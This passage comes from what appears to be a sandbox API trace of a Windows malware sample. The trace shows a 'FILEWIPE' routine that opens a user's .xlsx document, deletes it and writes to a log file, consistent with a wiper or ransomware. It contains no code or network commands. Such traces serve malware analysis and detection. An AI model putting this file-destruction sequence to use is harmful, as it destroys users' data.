lpMsg=0x6ae6f4) returned 0 [0032.779] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.779] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0032.779] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0032.779] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0032.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0032.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0032.779] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0032.779] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.779] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0032.779] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.779] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.779] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0032.779] FreeLibrary (hLibModule=0x754b0000) returned 1 [0032.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0032.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0032.779] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0032.779] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0032.779] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0032.779] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.779] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.780] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.781] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.781] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0032.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0032.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.781] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.781] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.781] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\60y_PcRGjqYHqff.xlsx", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3316690, ftCreationTime.dwHighDateTime=0x1d5a10d, ftLastAccessTime.dwLowDateTime=0x20ab7280, ftLastAccessTime.dwHighDateTime=0x1d552db, ftLastWriteTime.dwLowDateTime=0x20ab7280, ftLastWriteTime.dwHighDateTime=0x1d552db, nFileSizeHigh=0x0, nFileSizeLow=0xcef6, dwReserved0=0x0, dwReserved1=0x777648, cFileName="60y_PcRGjqYHqff.xlsx", cAlternateFileName="60Y_PC~1.XLS")) returned 0x7c2240 [0032.781] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0032.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0032.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0032.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0032.781] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0032.781] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.782] CharLowerBuffW (in: lpsz="byte[52982]", cchLength=0xb | out: lpsz="byte[52982]") returned 0xb [0032.782] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.782] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0032.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0032.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.782] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.782] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0032.782] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0032.782] FreeLibrary (hLibModule=0x76b40000) returned 1 [0032.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0032.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0032.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0032.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0032.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0032.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0032.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0032.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0032.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0032.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0032.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0032.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0032.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0032.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0032.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0032.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0032.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0032.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0032.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0032.782] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0032.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0032.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0032.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0032.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0032.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0032.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0032.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0032.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0032.783] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.783] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.783] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.783] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.783] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0032.783] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.783] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.783] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.783] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.783] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.783] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.783] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.783] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.783] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.783] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.783] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.783] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.783] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.783] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.783] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.784] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.784] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0032.784] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.784] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\60y_PcRGjqYHqff.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\60y_pcrgjqyhqff.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0032.784] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.784] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.784] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.784] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.784] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0032.784] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.784] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.784] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.785] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.785] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.785] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.785] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.785] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.785] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0032.785] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.785] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.785] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.785] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.785] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.785] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.785] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.785] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\60y_PcRGjqYHqff.xlsx", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\60y_PcRGjqYHqff.xlsx", lpFilePart=0x0) returned 0x3c [0032.785] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\60y_PcRGjqYHqff.xlsx", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3316690, ftCreationTime.dwHighDateTime=0x1d5a10d, ftLastAccessTime.dwLowDateTime=0x20ab7280, ftLastAccessTime.dwHighDateTime=0x1d552db, ftLastWriteTime.dwLowDateTime=0x136dc8e0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xcef6, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="60y_PcRGjqYHqff.xlsx", cAlternateFileName="60Y_PC~1.XLS")) returned 0x7c2240 [0032.785] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\60y_PcRGjqYHqff.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\60y_pcrgjqyhqff.xlsx")) returned 1 [0032.787] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3316690, ftCreationTime.dwHighDateTime=0x1d5a10d, ftLastAccessTime.dwLowDateTime=0x20ab7280, ftLastAccessTime.dwHighDateTime=0x1d552db, ftLastWriteTime.dwLowDateTime=0x136dc8e0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xcef6, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="60y_PcRGjqYHqff.xlsx", cAlternateFileName="60Y_PC~1.XLS")) returned 0 [0032.787] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0032.787] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.787] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0032.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0032.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0032.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0032.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0032.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0032.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0032.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0032.787] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0032.788] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0032.788] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0032.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0032.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0032.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.788] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0032.788] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0032.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0032.788] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0032.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0032.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0032.788] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0032.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0032.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0032.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0032.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0032.788] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0032.788] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0032.788] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0032.789] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.789] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0032.789] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.789] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0032.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0032.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0032.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0032.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0032.789] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0032.789] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0xd86, lpOverlapped=0x0) returned 1 [0032.789] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0032.789] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0xd86, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.789] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0032.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0032.789] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0032.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0032.789] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0032.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 